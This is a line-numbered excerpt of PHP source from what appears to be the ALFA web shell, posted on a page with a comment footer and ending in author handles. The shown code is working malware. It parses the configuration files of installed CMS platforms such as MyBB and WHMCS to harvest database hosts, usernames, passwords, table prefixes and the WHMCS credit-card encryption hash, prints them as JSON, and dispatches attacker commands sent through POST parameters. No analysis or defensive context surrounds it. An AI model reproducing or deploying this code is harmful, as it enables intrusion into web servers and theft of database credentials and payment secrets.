  6113. 'host'=>array("/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6114. 'dbname'=>array("/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6115. 'dbuser'=>array("/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6116. 'dbpw'=>array("/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6117. 'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6118. ),
  6119. 'mybb'=>array('file'=>'/inc/config.php',
  6120. 'host'=>array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6121. 'dbname'=>array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6122. 'dbuser'=>array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6123. 'dbpw'=>array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
  6124. 'prefix'=>array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
  6125. )
  6126. );
  6127. $data = array();
  6128. $srch_host = $config[$cms]['host'][0];
  6129. $srch_user = $config[$cms]['dbuser'][0];
  6130. $srch_name = $config[$cms]['dbname'][0];
  6131. $srch_pw = $config[$cms]['dbpw'][0];
  6132. $prefix = $config[$cms]['prefix'][0];
  6133. $file = $config[$cms]['file'];
  6134. $chost = $config[$cms]['host'][1];
  6135. $cuser = $config[$cms]['dbuser'][1];
  6136. $cname = $config[$cms]['dbname'][1];
  6137. $cpw = $config[$cms]['dbpw'][1];
  6138. $cprefix = $config[$cms]['prefix'][1];
  6139. if(@is_dir($path)||_alfa_is_dir($path)){
  6140. $file=$path.$file;
  6141. }elseif(@is_file($path)||_alfa_is_dir($path,"-e")){
  6142. $file=$path;
  6143. }else{
  6144. return false;
  6145. }
  6146. $file = __read_file($file);
  6147. if(preg_match($srch_host, $file, $mach)){
  6148. $data['host'] = $mach[$chost];
  6149. }
  6150. if(preg_match($srch_user, $file, $mach)){
  6151. $data['user'] = $mach[$cuser];
  6152. }
  6153. if(preg_match($srch_name, $file, $mach)){
  6154. $data['dbname'] = $mach[$cname];
  6155. }
  6156. if(preg_match($srch_pw, $file, $mach)){
  6157. $data['password'] = $mach[$cpw];
  6158. }
  6159. if(isset($prefix)){
  6160. if(preg_match($prefix, $file, $mach)){
  6161. $data['prefix'] = $mach[$cprefix];
  6162. }
  6163. }
  6164. if($cms=='whmcs'){
  6165. if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){
  6166. $data['cc_encryption_hash'] = $mach[3];
  6167. }
  6168. }
  6169. echo json_encode($data);
  6170. }
  6171. if(empty($_POST['a']))
  6172. if(isset($default_action) && function_exists('alfa' . $default_action))
  6173. $_POST['a'] = $default_action;
  6174. else
  6175. $_POST['a'] = 'FilesMan';
  6176. if(!empty($_POST['a']) && function_exists('alfa' . $_POST['a']))
  6177. call_user_func('alfa' . $_POST['a']);
  6178. exit;
  6179. /*
  6180. #Persian Gulf For Ever
  6181. #skype : sole.sad
  6182. #skype : ehsan.invisible
  6183. */

comments powered by Disqus